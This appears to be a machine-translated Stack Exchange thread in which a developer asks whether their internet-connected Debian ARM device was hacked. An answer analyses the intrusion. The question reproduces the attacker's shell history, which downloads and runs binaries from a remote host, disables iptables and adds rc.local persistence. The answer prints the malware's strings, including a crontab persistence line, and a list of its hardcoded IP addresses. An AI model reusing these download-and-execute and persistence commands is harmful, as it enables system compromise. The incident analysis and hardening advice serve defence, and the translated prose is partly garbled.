আমি কি শুধু হ্যাক পেয়েছি?


492

আমি একটি ভোক্তা পণ্য বিকাশ করছি এবং এটি ইন্টারনেটের সাথে সংযুক্ত হওয়ার কথা, সুতরাং প্রত্যাশার মতো এটি ইন্টারনেটের সাথে সংযুক্ত যাতে আমি এটি সঠিকভাবে বিকাশ করতে পারি।

আমি এক ঘন্টা বা দুই ঘন্টা চলে গেলাম এবং আমার অফিসে ফিরে এসে টার্মিনালে কিছু অদ্ভুত কমান্ড লেখা লক্ষ্য করলাম।

auth.logআমি লিনাক্স লগ ফাইলটি দেখছি নীচের লাইনগুলি দেখতে পাচ্ছি (আরও অনেকের মাঝে):

Feb  1 10:45:10 debian-armhf sshd[994]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=40.127.205.162  user=root
Feb  1 10:45:12 debian-armhf sshd[994]: Failed password for root from 40.127.205.162 port 37198 ssh2
Feb  1 10:45:12 debian-armhf sshd[994]: Received disconnect from 40.127.205.162: 11: Bye Bye [preauth]

আইপি ঠিকানাটি মাইক্রোসফ্টের মালিকানাধীন40.127.205.162 পরিণত হয়েছে ।

আমি দূরে থাকাকালীন এই সমস্ত কমান্ড ব্যবহার করলাম:

  355  service iptables stop
  356  cd /tmp
  357  wget http://222.186.30.209:65534/yjz1
  358  chmod 0755 /tmp/yjz1
  359  nohup /tmp/yjz1 > /dev/null 2>&1 &
  360  chmod 777 yjz1
  361  ./yjz1
  362  chmod 0755 /tmp/yjz1
  363  nohup /tmp/yjz1 > /dev/null 2>&1 &
  364  chmod 0777 yjz1
  365  chmod u+x yjz1
  366  ./yjz1 &
  367  chmod u+x yjz1
  368  ./yjz1 &
  369  wget http://222.186.30.209:65534/yjz
  370  chmod 0755 /tmp/yjz
  371  nohup /tmp/yjz > /dev/null 2>&1 &
  372  chmod 777 yjz
  373  ./yjz
  374  chmod 0755 /tmp/yjz
  375  nohup /tmp/yjz > /dev/null 2>&1 &
  376  chmod u+x yjz
  377  ./yjz &
  378  chmod u+x yjz
  379  ./yjz &
  380  cd /tmp
  381  echo "cd  /tmp/">>/etc/rc.local
  382  service iptables stop
  383  cd /tmp
  384  wget http://222.186.30.209:65534/yjz1
  385  chmod 0755 /tmp/yjz1
  386  nohup /tmp/yjz1 > /dev/null 2>&1 &
  387  chmod 777 yjz1
  388  ./yjz1
  389  chmod 0755 /tmp/yjz1
  390  nohup /tmp/yjz1 > /dev/null 2>&1 &
  391  chmod u+x yjz1
  392  ./yjz1 &
  393  chmod 0777 yjz1
  394  ./yjz1 &
  395  echo "cd  /tmp/">>/etc/rc.local
  396  service iptables stop
  397  wget http://222.186.30.209:65534/yjz1
  398  chmod 0755 /root/yjz1
  399  nohup /root/yjz1 > /dev/null 2>&1 &
  400  chmod 777 yjz1
  401  ./yjz1
  402  chmod 0755 /root/yjz1
  403  nohup /root/yjz1 > /dev/null 2>&1 &
  404  chmod u+x yjz1
  405  ./yjz1 &
  406  chmod 0777 yjz1
  407  ./yjz1 &
  408  echo "cd  /root/">>/etc/rc.local
  409  cd /tmp
  410  service iptables stop
  411  wget http://222.186.30.209:65534/yjz1
  412  chmod 0755 /tmp/yjz1
  413  nohup /tmp/yjz1 > /dev/null 2>&1 &
  414  chmod 777 yjz1
  415  ./yjz1 &
  416  cd /etc
  417  echo "cd /root/">>/etc/rc.local
  418  echo "./yjz1&">>/etc/rc.local
  419  echo "./yjz1&">>/etc/rc.local
  420  echo "/etc/init.d/iptables stop">>/etc/rc.local
  421  cd /tmp
  422  service iptables stop
  423  wget http://222.186.30.209:65534/yjz1
  424  chmod 0755 /tmp/yjz1
  425  nohup /tmp/yjz1 > /dev/null 2>&1 &
  426  chmod 777 yjz1
  427  ./yjz1 &
  428  cd /etc
  429  echo "cd /root/">>/etc/rc.local
  430  echo "./yjz1&">>/etc/rc.local
  431  echo "./yjz1&">>/etc/rc.local
  432  echo "/etc/init.d/iptables stop">>/etc/rc.local
  433  cd /tmp
  434  service iptables stop
  435  wget http://222.186.30.209:65534/yjz1
  436  chmod 0755 /tmp/yjz1
  437  nohup /tmp/yjz1 > /dev/null 2>&1 &
  438  chmod 777 yjz1
  439  ./yjz1 &
  440  cd /etc
  441  echo "cd /root/">>/etc/rc.local
  442  echo "./yjz1&">>/etc/rc.local
  443  echo "./yjz1&">>/etc/rc.local
  444  echo "/etc/init.d/iptables stop">>/etc/rc.local
  445  service iptables stop
  446  wget http://222.186.30.209:65534/yjz1
  447  chmod 0755 /root/yjz1
  448  nohup /root/yjz1 > /dev/null 2>&1 &
  449  chmod 777 yjz1
  450  ./yjz1
  451  chmod 0755 /root/yjz1
  452  nohup /root/yjz1 > /dev/null 2>&1 &
  453  chmod 0777 yjz1
  454  chmod u+x yjz1
  455  ./yjz1 &
  456  chmod u+x yjz1
  457  ./yjz1 &

এবং আরও:

  481  service iptables stop
  482  wget http://222.186.30.209:65534/yjz1
  483  chmod 0755 /root/yjz1
  484  nohup /root/yjz1 > /dev/null 2>&1 &
  485  chmod 777 yjz1
  486  ./yjz1
  487  chmod 0755 /root/yjz1
  488  nohup /root/yjz1 > /dev/null 2>&1 &
  489  chmod 0777 yjz1
  490  chmod u+x yjz1
  491  ./yjz1 &
  492  chmod u+x yjz1
  493  ./yjz1 &
  494  cd /tmp
  495  service iptables stop
  496  wget http://175.102.133.55:2/yjz
  497  ./yd_cd/make
  498  service iptables stop
  499  service iptables stop
  500  wget http://222.186.30.209:65534/yjz1

আমি এ সম্পর্কে সম্পূর্ণ অসচেতন ছিলাম। আমি কীভাবে আমার পণ্যটি সঠিকভাবে সুরক্ষিত করতে পারি?

আমি সম্পূর্ণ auth.logফাইল পোস্ট করতে চাই । আমি কেমন করে ঐটি করি?

এছাড়াও, yjz1ডাউনলোড করা ফাইলটি একটি লিনাক্স ট্রোজান বলে মনে হচ্ছে এবং এই সমস্ত কিছু http://anti-hacker-alliance.com/index.php?ip=40.127.205.162 অনুসারে কোনও একরকম হ্যাকার গ্রুপ দ্বারা সম্পন্ন হয়েছে বলে মনে হচ্ছে

আমার কি মাইক্রোসফ্টকে ফোন করে তাদের সাথে কথা বলা উচিত? আমার কি করা উচিৎ?


40
হ্যাঁ, এটি খুব ভাল দেখাচ্ছে না। আমি কোনও উপায়ে লিনাক্সের বিশেষজ্ঞ নই, তবে কিছু কিছু অবশ্যই সেখানে কার্যকর করার চেষ্টা করেছিল। আমি একেবারে নিশ্চিত নই যদিও এটি দেখে মনে হচ্ছে এটি মূল হিসাবে লগ ইন করার চেষ্টা করেছে এবং ব্যর্থ হয়েছে। আপনার auth.log এ অন্য কোনও লগ আছে? দূরবর্তী প্রশাসকের অন্য কোন উপায়? আমি ভিএনসি সার্ভার সক্ষম ম্যাকের সাথে তার আগে হ্যাক হতে দেখেছি, যদিও এটি কোনও এসএসএইচ প্রচেষ্টা বলে মনে হচ্ছে। দেখে মনে হচ্ছে এটি যে আইপিগুলি ডাউনলোড করছিল তা চীনে কোথাও হোস্ট করা আছে।
জোনো

68
আপনি জোর করে জোর করে পেয়েছেন। আপনার পাসওয়ার্ড থাকা সত্ত্বেও কেউ একটি এসএসএস সার্ভারটি ইন্টারনেটে ছেড়ে যায় না। কী ভিত্তিক লেখকের সংক্ষিপ্ত যে কোনও কিছুই আজকাল পর্যাপ্ত সুরক্ষিত নয়।
যাত্রামন গীক

80
আচ্ছা আমাদের সিকিউরিটি.স্ট্যাকেক্সচেঞ্জ.কম । তবে প্রথমে প্রথমে: আপোস করা হোস্টকে আর বিশ্বাস করা যায় না। এটি নেটওয়ার্ক থেকে সরিয়ে নিন। সম্ভব হলে একটি ব্যাকআপ তৈরি করুন যাতে আপনি কী করা হয়েছিল এবং কীভাবে তা গবেষণা করতে পারেন। এর পরে একটি পরিষ্কার উত্স থেকে ওএস পুনরায় ইনস্টল করুন। ব্যাকআপ থেকে ডেটা পুনরুদ্ধার করুন। সিস্টেমটি সুরক্ষিত করুন যাতে আপনি আবার সংক্রামিত না হন। কীভাবে তারা পেয়েছেন তা সন্ধানের জন্য সুপারিশ করা হয়। (তাই সংক্রামিত সিস্টেমের একটি অনুলিপি করার জন্য সুপারিশ)।
হেনেস

84
এফওয়াইআই: 40.127.205.162 জিওআইপি অনুসারে মাইক্রোসফ্ট অ্যাজুরি আইপি ঠিকানা। ফলস্বরূপ, আপনি আক্রমণটির জন্য মাইক্রোসফ্টকে দোষ দিতে পারবেন না - এটি অ্যামাজনকে দোষ দেওয়ার সমতুল্য কারণ কেউ স্প্যামের জন্য ইসি 2 ব্যবহার করেছিল। মাইক্রোসফ্ট সত্যই কেবল যা করতে পারে তা হল আক্রমণকারীদের লাথি মেরে লাফিয়ে মেরে ফেলা, তবে তারা কোনও ভিন্ন সময়ে ক্লাউড প্ল্যাটফর্মে ফিরে আসবে।
nneonneo

41
প্রকৃতপক্ষে, এটি যদি আপনার টার্মিনালে লেখা থাকে তবে হ্যাকার সম্ভবত পরবর্তী ঘনক্ষেত্রে বসে আছেন।
ইসানায়ে

উত্তর:


487

সম্পাদনা 2 :

এই পোস্টটি এত বেশি মনোযোগ আকর্ষণ করার একটি কারণ রয়েছে: আপনি আপনার পিসিতে একটি অনুপ্রবেশকারীটির পুরো, লাইভ সেশনটি রেকর্ড করতে সক্ষম হয়েছেন। এটি আমাদের প্রাত্যহিক অভিজ্ঞতার থেকে অনেকটাই আলাদা, যেখানে আমরা তাঁর ক্রিয়াকলাপগুলির পরিণতিগুলির আবিষ্কারের সাথে মোকাবিলা করি এবং সেগুলি সমাধান করার চেষ্টা করি। এখানে আমরা তাকে কর্মক্ষেত্রে দেখি, তার পিছনের অংশটি প্রতিষ্ঠিত করতে, তার পদক্ষেপগুলি প্রত্যাহার করে, জ্বরে কাজ করে দেখে (সম্ভবত কারণ তিনি আপনার ডেস্কে বসে ছিলেন, উপরে প্রস্তাবিত হিসাবে, বা সম্ভবত এবং সম্ভবত আমার মতে, কারণ তিনি ছিলেন তার ম্যালওয়্যারটি সিস্টেমে চালাতে অক্ষম, নীচে পড়ুন) এবং নিয়ন্ত্রণের সম্পূর্ণ স্বয়ংসম্পূর্ণ যন্ত্র স্থাপন করার চেষ্টা করুন। সুরক্ষা গবেষকরা প্রতিদিন তাদের মধুর জাল দিয়ে এটি প্রত্যক্ষ করেন । আমার জন্য, এটি খুব বিরল সুযোগ এবং কিছু পরিতোষের উত্স।


আপনাকে অবশ্যই হ্যাক করা হয়েছে। এর জন্য প্রমাণগুলি আপনার প্রদর্শিত ফাইলের স্নিপেট থেকে আসে নাauth.log , কারণ এটি একটি ব্যর্থ লগইন প্রচেষ্টা হিসাবে রিপোর্ট করে, স্বল্প সময়ের মধ্যে (দুই সেকেন্ড) ঘটে) আপনি লক্ষ্য করবেন যে দ্বিতীয় রেখায় বলা হয়েছে Failed password, তৃতীয়টি একটি pre-authসংযোগ বিচ্ছিন্ন করার কথা জানিয়েছে : লোকটি চেষ্টা করে ব্যর্থ হয়েছে।

প্রমাণ দুটি ফাইলের বিষয়বস্তু থেকে আসে http://222.186.30.209:65534/yjzএবং http://222.186.30.209:65534/yjz1আক্রমণকারী আপনার সিস্টেমে ডাউনলোড করে।

সাইটগুলি বর্তমানে ডাউনলোড করার জন্য প্রত্যেকের জন্য উন্মুক্ত, যা আমি করেছি। আমি প্রথম fileতাদের উপর দৌড়েছি , যা দেখায়:

$ file y*
yjz:      ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
yjz1:     ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped

তারপরে আমি তাদের একটি 64-বিট দেবিয়ান ভিএম-এ নিয়ে এসেছি; stringsকমান্ডের মাধ্যমে তাদের বিষয়বস্তুগুলির একটি পরীক্ষা অনেকগুলি সন্দেহজনক বলে উদ্ঘাটিত হয়েছিল (বিভিন্ন নামীদামী হামলার রেফারেন্স, প্রতিস্থাপিত হবার আদেশগুলির প্রতি, একটি স্ক্রিপ্ট যা স্পষ্টভাবে একটি নতুন পরিষেবা সেটআপ করার জন্য ব্যবহৃত হয়েছিল, ইত্যাদি)।

তারপরে আমি উভয় ফাইলের এমডি 5-হ্যাশগুলি তৈরি করেছি এবং সেগুলি ম্যালওয়ারের পরিচিত এজেন্ট কিনা তা দেখার জন্য তাদের কেমরুর হ্যাশ ডাটাবেসে খাওয়ালাম। যদিও yjzতা নেই, yjz1এবং সাইমরু 58% এর অ্যান্টি-ভাইরাস সফ্টওয়্যার দ্বারা সনাক্তকরণের সম্ভাবনা রিপোর্ট করে। এটি আরও জানিয়েছে যে এই ফাইলটি প্রায় তিন দিন আগে শেষবার দেখা হয়েছিল, সুতরাং এটি যুক্তিযুক্তভাবে সাম্প্রতিক।

চলমান clamscan (অংশ clamavদুটি ফাইলের আমি প্রাপ্ত প্যাকেজ):

$ clamscan y*
yjz: Linux.Backdoor.Gates FOUND
yjz1: Linux.Trojan.Xorddos FOUND

সুতরাং আমরা এখন নিশ্চিত যে স্ট্যান্ডার্ড লিনাক্স সফ্টওয়্যার এটি সনাক্ত করতে পারে।

তোমার কি করা উচিত?

পরিবর্তে নতুন, উভয়ই সিস্টেম খুব নতুন নয়, উদাহরণস্বরূপ, XorDdos এ 2015 সালের এই নিবন্ধটি দেখুন । সুতরাং বেশিরভাগ ফ্রি প্যাকেজগুলি এটিকে সরাতে সক্ষম হওয়া উচিত। আপনি চেষ্টা করা উচিত: clamav, rkhunter, chkrootkit। আমি প্রায় গুগল করেছি এবং দেখেছি তারা এটি স্পট করতে সক্ষম বলে দাবি করেছে। পূর্বসূরীর কাজ পরীক্ষা করতে সেগুলি ব্যবহার করুন, তবে এই তিনটি প্রোগ্রাম চালানোর পরে আপনার যেতে প্রস্তুত হওয়া উচিত।

বৃহত্তর প্রশ্ন হিসাবে what should you do to prevent future infections, জার্নম্যানের উত্তর একটি ভাল প্রথম ধাপ। কেবল মনে রাখবেন যে এটি একটি চলমান সংগ্রাম, এটি আমাদের সবার (আমাকে সহ!) খুব ভালভাবে না জেনেও হারিয়ে যেতে পারে।

সম্পাদনা :

ভিক্টর টোথের (পরোক্ষ) প্রম্পটে আমি কয়েকটি মন্তব্য যুক্ত করতে চাই। এটি অবশ্যই সত্য যে অনুপ্রবেশকারী কিছু অসুবিধার মুখোমুখি হয়েছিল: সে দুটি পৃথক হ্যাকিংয়ের সরঞ্জাম ডাউনলোড করে, বেশ কয়েকবার তাদের অনুমতি পরিবর্তন করে, কয়েকবার পুনরায় আরম্ভ করে এবং ফায়ারওয়ালটি অক্ষম করার জন্য বহুবার চেষ্টা করে। কী ঘটছে তা অনুমান করা সহজ: তিনি প্রত্যাশা করেন যে তার হ্যাকিংয়ের সরঞ্জামগুলি তার কোনও সংক্রামিত পিসি (পরে দেখুন) এর দিকে একটি যোগাযোগের চ্যানেলটি খুলবে এবং যখন তিনি এই নতুন চ্যানেলটিকে তার নিয়ন্ত্রণ জিইউআইতে দেখতে পাবে না, তখন তার হ্যাকিংয়ের ভয় রয়েছে ফায়ারওয়াল দ্বারা সরঞ্জামটি অবরুদ্ধ করা হচ্ছে, তাই তিনি ইনস্টলেশন পদ্ধতিটি পুনরাবৃত্তি করেন। আমি ভিক্টর টোথের সাথে একমত হই যে তাঁর অভিযানের এই বিশেষ পর্যায়ে প্রত্যাশিত ফল আনা বলে মনে হচ্ছে না, তবে আমি আপনাকে খুব দৃ strongly়ভাবে উত্সাহিত করতে চাই আপনার পিসিতে যে পরিমাণ ক্ষয়ক্ষতি হয়েছে তা হ্রাস করা উচিত নয়।

আমি এখানে একটি আংশিক আউটপুট প্রদান strings yjz1:

etc/init.d/%s
/etc/rc%d.d/S90%s
--del
chkconfig
remove
update-rc.d
/etc/cron.hourly/gcc4.sh
/etc/rc.d/rc%d.d/S90%s
--add
defaults
/proc/%d/exe
/proc/self/exe
HOME=/
MYSQL_HISTFILE=/dev/null
#!/bin/sh
# chkconfig: 12345 90 90
# description: %s
### BEGIN INIT INFO
# Provides:             %s
# Required-Start:
# Required-Stop:
# Default-Start:        1 2 3 4 5
# Default-Stop:
# Short-Description:    %s
### END INIT INFO
case $1 in
start)
stop)
esac
sed -i '/\/etc\/cron.hourly\/gcc4.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc4.sh' >> /etc/crontab
etc/init.d/%s
GET %s HTTP/1.1
%sHost: %s
POST %s HTTP/1.1
%sHost: %s
Content-Type: application/x-www-form-urlencoded
Content-Length: %d
%s%s
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1;      TencentTraveler ; .NET CLR 1.1.4322)
Connection: Keep-Alive

এই (ইন পরিষেবার সঙ্গে গরমিল প্রমাণ প্রদান করে /etc/init.dএবং /etc/rc.d,) সঙ্গে crontab, ইতিহাস ফাইলের সাথে mysql, এবং ফাইল কয়েক procযা লিঙ্ক bash(যা একটি অর্ডারি আপনার শেলের প্রতারণাপূর্ণ সংস্করণ প্রস্তাব দেওয়া রোপণ করা হয়েছে)। তারপরে প্রোগ্রামটি একটি এইচটিটিপি অনুরোধ উত্পন্ন করে (একটি চীনা-ভাষী সাইটে,

 Accept-Language: zh-cn

যা উপরে ডেভিড শোয়ার্জের মন্তব্যে পদার্থ সরবরাহ করে), যা আরও বেশি বিপর্যয় সৃষ্টি করতে পারে। অনুরোধে, বাইনারিগুলি ( Content-Type: application/x-www-form-urlencoded) আক্রমণ করা পিসিতে (জিইটি) ডাউনলোড করে নিয়ন্ত্রণকারী মেশিনে (পিওএসটি) আপলোড করতে হবে। আক্রমনাত্মক পিসিতে কী ডাউনলোড হবে তা আমি প্রতিষ্ঠিত করতে পারিনি, তবে, উভয়েরই ছোট আকার yjzএবং yjz1(১.১ এমবি এবং k০০ কেবি, প্রতিলিপি) দিয়ে, আমি এটি রক্ষা করতে পারি যে বেশিরভাগ ফাইলের রুটকিট আবদ্ধ করার জন্য প্রয়োজন, অর্থাৎ পরিবর্তিত এর সংস্করণ ls, netstat, ps, ifconfig, ..., এই ভাবে ডাউনলোড করা যাবে। এবং এটি এই ডাউনলোডটি চালিয়ে যাওয়ার জন্য আক্রমণকারীর জ্বরমূলক প্রয়াসকে ব্যাখ্যা করবে।

উপরোক্ত সমস্ত সম্ভাবনা ক্লান্ত করে তোলে এমন কোনও সত্যতা নেই: আমাদের অবশ্যই প্রতিলিপিটির কিছু অংশ নেই (457 এবং 481 লাইনের মধ্যে) এবং আমরা একটি লগআউট দেখতে পাই না; তদুপরি, বিশেষত উদ্বেগজনক হ'ল লাইন 495-497,

cd /tmp;  ./yd_cd/make

যা কোনও ফাইল ডাউনলোড করে যা আমরা দেখি নি এবং এটি সংকলন হতে পারে: যদি তা হয় তবে এর অর্থ আক্রমণকারী তার এক্সিকিউটেবলগুলির মধ্যে সমস্যাটি কী তা বুঝতে পেরেছিল (অবশেষে?) এবং এটি সমাধানের চেষ্টা করছে, এক্ষেত্রে ক্ষেত্রে আক্রমণ পিসি ভাল হয়েছে। [আসলে, আক্রমণকারী হ্যাকড মেশিনে ডাউনলোড করা ম্যালওয়ারের দুটি সংস্করণ (এবং আমি আমার 64 বিবিট দেবিয়ান ভিএম এর উপরে) একটি অনুপযুক্ত আর্কিটেকচার, x86 এর জন্য, অন্যদিকে হ্যাক-ইন পিসির নামটি এই সত্যটিকে দূরে সরিয়ে দেয় তিনি একটি আর্ম আর্কিটেকচারের সাথে কথা বলছিলেন]।

আমি এই সম্পাদনাটি যে কারণে লিখেছি তা হ'ল পেশাদার সিস্টেমের সাহায্যে আপনার সিস্টেমে ঝাঁকুনি দেওয়া বা স্ক্র্যাচ থেকে পুনরায় ইনস্টল করার জন্য আপনাকে যথাসম্ভব দৃ strongly়তার সাথে অনুরোধ করা।

এবং, যাইহোক, এটি কারও পক্ষে কার্যকর প্রমাণিত হওয়া উচিত, এটি 331 আইপি ঠিকানাগুলির তালিকা যা yjzসংযোগ করার চেষ্টা করে। এই তালিকাটি এত বড় (এবং সম্ভবত এখনও স্থির হয়ে ওঠার নিয়ত) যে আমি বিশ্বাস করি এটি হ'ল छेলাচল করার কারণ mysql। অন্যান্য ব্যাকডোরের সরবরাহিত তালিকাটি অভিন্ন, যা আমার ধারণা, এই জাতীয় গুরুত্বপূর্ণ তথ্য খোলার বাইরে রেখে যাওয়ার কারণ (আমি মনে করি যে আক্রমণকারী তাদের কার্নেল ফর্ম্যাটে সংরক্ষণের চেষ্টা করতে চায়নি, তাই তিনি পুরো তালিকাটি একটি পরিষ্কার-টেক্সট ফাইলে রেখেছিলেন, যা সম্ভবত তাঁর সমস্ত বাড়ির পিছনে যে কোনও ওএস-এর জন্য পঠন রয়েছে):

61.132.163.68
202.102.192.68
202.102.213.68
202.102.200.101
58.242.2.2
202.38.64.1
211.91.88.129
211.138.180.2
218.104.78.2
202.102.199.68
202.175.3.3
202.175.3.8
202.112.144.30
61.233.9.9
61.233.9.61
124.207.160.110
202.97.7.6
202.97.7.17
202.106.0.20
202.106.46.151
202.106.195.68
202.106.196.115
202.106.196.212
202.106.196.228
202.106.196.230
202.106.196.232
202.106.196.237
202.112.112.10
211.136.17.107
211.136.28.231
211.136.28.234
211.136.28.237
211.147.6.3
219.141.136.10
219.141.140.10
219.141.148.37
219.141.148.39
219.239.26.42
221.130.32.100
221.130.32.103
221.130.32.106
221.130.32.109
221.130.33.52
221.130.33.60
221.176.3.70
221.176.3.73
221.176.3.76
221.176.3.79
221.176.3.83
221.176.3.85
221.176.4.6
221.176.4.9
221.176.4.12
221.176.4.15
221.176.4.18
221.176.4.21
58.22.96.66
218.104.128.106
202.101.98.55
211.138.145.194
211.138.151.161
211.138.156.66
218.85.152.99
218.85.157.99
222.47.29.93
202.101.107.85
119.233.255.228
222.47.62.142
122.72.33.240
211.98.121.27
218.203.160.194
221.7.34.10
61.235.70.98
113.111.211.22
202.96.128.68
202.96.128.86
202.96.128.166
210.21.3.140
210.21.4.130
211.95.193.97
211.98.2.4
211.98.4.1
211.162.61.225
211.162.61.235
211.162.61.255
211.162.62.1
211.162.62.60
221.4.66.66
202.103.176.22
202.96.144.47
210.38.192.33
202.96.134.33
202.96.134.133
202.96.154.15
210.21.196.6
221.5.88.88
202.103.243.112
202.193.64.33
61.235.164.13
61.235.164.18
202.103.225.68
221.7.136.68
202.103.224.68
211.97.64.129
211.138.240.100
211.138.242.18
211.138.245.180
221.7.128.68
222.52.118.162
202.98.192.67
202.98.198.167
211.92.136.81
211.139.1.3
211.139.2.18
202.100.192.68
211.97.96.65
211.138.164.6
221.11.132.2
202.100.199.8
202.99.160.68
202.99.166.4
202.99.168.8
222.222.222.222
202.102.224.68
202.102.227.68
222.85.85.85
222.88.88.88
210.42.241.1
202.196.64.1
112.100.100.100
202.97.224.68
219.235.127.1
61.236.93.33
211.93.24.129
211.137.241.34
219.147.198.230
202.103.0.68
202.103.0.117
202.103.24.68
202.103.44.150
202.114.0.242
202.114.240.6
211.161.158.11
211.161.159.3
218.104.111.114
218.104.111.122
218.106.127.114
218.106.127.122
221.232.129.30
59.51.78.210
61.234.254.5
202.103.96.112
219.72.225.253
222.243.129.81
222.246.129.80
211.142.210.98
211.142.210.100
220.168.208.3
220.168.208.6
220.170.64.68
218.76.192.100
61.187.98.3
61.187.98.6
202.98.0.68
211.93.64.129
211.141.16.99
202.98.5.68
219.149.194.55
211.138.200.69
202.102.3.141
202.102.3.144
58.240.57.33
112.4.0.55
114.114.114.114
114.114.115.115
202.102.24.34
218.2.135.1
221.6.4.66
221.131.143.69
202.102.8.141
222.45.0.110
61.177.7.1
218.104.32.106
211.103.13.101
221.228.255.1
61.147.37.1
222.45.1.40
58.241.208.46
202.102.9.141
202.102.7.90
202.101.224.68
202.101.226.68
211.141.90.68
211.137.32.178
202.96.69.38
211.140.197.58
219.149.6.99
202.96.86.18
101.47.189.10
101.47.189.18
118.29.249.50
118.29.249.54
202.96.64.68
202.96.75.68
202.118.1.29
202.118.1.53
219.148.204.66
202.99.224.8
202.99.224.67
211.90.72.65
211.138.91.1
218.203.101.3
202.100.96.68
211.93.0.81
222.75.152.129
211.138.75.123
202.102.154.3
202.102.152.3
219.146.1.66
219.147.1.66
202.102.128.68
202.102.134.68
211.138.106.19
211.90.80.65
202.99.192.66
202.99.192.68
61.134.1.4
202.117.96.5
202.117.96.10
218.30.19.40
218.30.19.50
116.228.111.118
180.168.255.18
202.96.209.5
202.96.209.133
202.101.6.2
211.95.1.97
211.95.72.1
211.136.112.50
211.136.150.66
119.6.6.6
124.161.97.234
124.161.97.238
124.161.97.242
61.139.2.69
202.98.96.68
202.115.32.36
202.115.32.39
218.6.200.139
218.89.0.124
61.139.54.66
61.139.39.73
139.175.10.20
139.175.55.244
139.175.150.20
139.175.252.16
168.95.1.1
210.200.211.193
210.200.211.225
211.78.130.1
61.31.1.1
61.31.233.1
168.95.192.1
168.95.192.174
61.60.224.3
61.60.224.5
202.113.16.10
202.113.16.11
202.99.96.68
202.99.104.68
211.137.160.5
211.137.160.185
219.150.32.132
202.98.224.68
211.139.73.34
61.10.0.130
61.10.1.130
202.14.67.4
202.14.67.14
202.45.84.58
202.45.84.67
202.60.252.8
202.85.128.32
203.80.96.9
203.142.100.18
203.142.100.21
203.186.94.20
203.186.94.241
221.7.1.20
61.128.114.133
61.128.114.166
218.202.152.130
61.166.150.123
202.203.128.33
211.98.72.7
211.139.29.68
211.139.29.150
211.139.29.170
221.3.131.11
222.172.200.68
61.166.150.101
61.166.150.139
202.203.144.33
202.203.160.33
202.203.192.33
202.203.208.33
202.203.224.33
211.92.144.161
222.221.5.240
61.166.25.129
202.96.103.36
221.12.1.227
221.130.252.200
222.46.120.5
202.96.96.68
218.108.248.219
218.108.248.245
61.130.254.34
60.191.244.5
202.96.104.15
202.96.104.26
221.12.33.227
202.96.107.27
61.128.128.68
61.128.192.68
218.201.17.2
221.5.203.86
221.5.203.90
221.5.203.98
221.7.92.86
221.7.92.98

নিম্নলিখিত কোড

 #!/bin/bash
 echo 0 > out
 while read i; do
       whois $i | grep -m 1 -i country >> out
 done < filename
 cat out | grep -i cn | wc -l

উপরের তালিকায় দেখানো হয়েছে যে মোট 331 ঠিকানার মধ্যে 302 ঠিকানা মূল ভূখণ্ড চিনে, বাকিগুলি হংকং, মঙ্গোলিয়া, তাইওয়ানের। এটি ডেভিড শোয়ার্জের যুক্তিতে আরও সমর্থন যোগ করে যে এটি বেশিরভাগই চাইনিজ বট রিং।

সম্পাদনা 3

@ বৈদদের অনুরোধে (ওপিটির লেখক, নীচে তার মন্তব্যটি পড়ুন), আমি কীভাবে একটি বেসিক লিনাক্স সিস্টেমের সুরক্ষা জোরদার করতে পারি (একটি সিস্টেমের জন্য অনেক পরিষেবা সরবরাহ করা, এটি আরও জটিল বিষয়) সম্পর্কে একটি মন্তব্য যুক্ত করব। vaidতিনি নিম্নলিখিত করেছেন বলে:

  1. সিস্টেমটি পুনরায় ইনস্টল করুন

  2. মিশ্র লোয়ার- এবং বড় হাতের অক্ষর এবং অক্ষর এবং অঙ্কগুলির সাথে 16 টি অক্ষরের দীর্ঘ পাসওয়ার্ডে রুট পাসওয়ার্ড পরিবর্তন হয়েছে।

  3. ব্যবহারকারীর নামটি একটি 6 টি মিশ্র অক্ষরের দীর্ঘ ব্যবহারকারীর নামতে পরিবর্তন করা হয়েছে এবং মূলের জন্য একই পাসওয়ার্ডটি প্রয়োগ করা হয়েছে

  4. এসএসএইচ বন্দরকে 5000 এর উপরে কিছুতে পরিবর্তন করা হয়েছে

  5. এসএসএইচ রুট লগইন বন্ধ করেছে।

এটি ঠিক আছে (আমি 10,000 এর উপরে একটি বন্দর ব্যবহার না করে যেহেতু অনেক দরকারী প্রোগ্রাম 10,000 এর নীচে পোর্ট ব্যবহার করে)। তবে আমি পাসওয়ার্ডের পরিবর্তে ssh লগইনের জন্য ক্রিপ্টোগ্রাফিক কীগুলি ব্যবহার করার প্রয়োজনীয়তার পক্ষে যথেষ্ট জোর দিতে পারি না । আমি আপনাকে একটি ব্যক্তিগত উদাহরণ দিতে হবে। আমার একটি ভিপিএসে, এসএস পোর্টটি পরিবর্তন করতে হবে কিনা তা নিয়ে আমি অনিশ্চিত ছিলাম; আমি এটি 22 এ রেখেছি, তবে প্রমাণীকরণের জন্য ক্রিপ্টো কী ব্যবহার করেছি। আমার প্রতিদিন শত শত ব্রেক-ইন প্রচেষ্টা ছিল , কেউই সফল হয়নি। প্রতিদিন যখন পরীক্ষা করতে ক্লান্ত হয়ে পড়ে যে কেউ সফল হয় নি, অবশেষে আমি বন্দরটি 10,000 এর উপরে কিছুতে স্যুইচ করেছি, ব্রেক-ইন প্রচেষ্টা শূন্যে চলে গেছে। মনে মনে, হ্যাকাররা বোকা (তারা নয়!), তারা কেবল সহজ শিকারের শিকার করে down

একটি স্বাক্ষর অ্যালগরিদম হিসাবে আরএসএ সহ একটি ক্রিপ্টো কী সক্রিয় করা সহজ, জান হুডেকের (নীচে ধন্যবাদ!) নীচে মন্তব্য দেখুন:

 cd; mkdir .ssh; chmod 700 .ssh; cd .ssh; ssh-keygen -t rsa (then hit <kbd>ENTER>/kbd> three times); cat id_rsa.pub >> authorized_keys; chmod 600 *

এখন আপনাকে যা করতে হবে তা হ'ল ফাইলটি id_rsaসেই মেশিনে অনুলিপি করতে হবে যা থেকে আপনি সংযোগ করতে চান (ডিরেক্টরিতে .ssh, chmod700 তেও সম্পাদনা করা), তারপরে কমান্ডটি জারি করুন

ssh -p YourChosenNonStandardPort -i ~/.ssh/id_rsa me@RemoteMachine

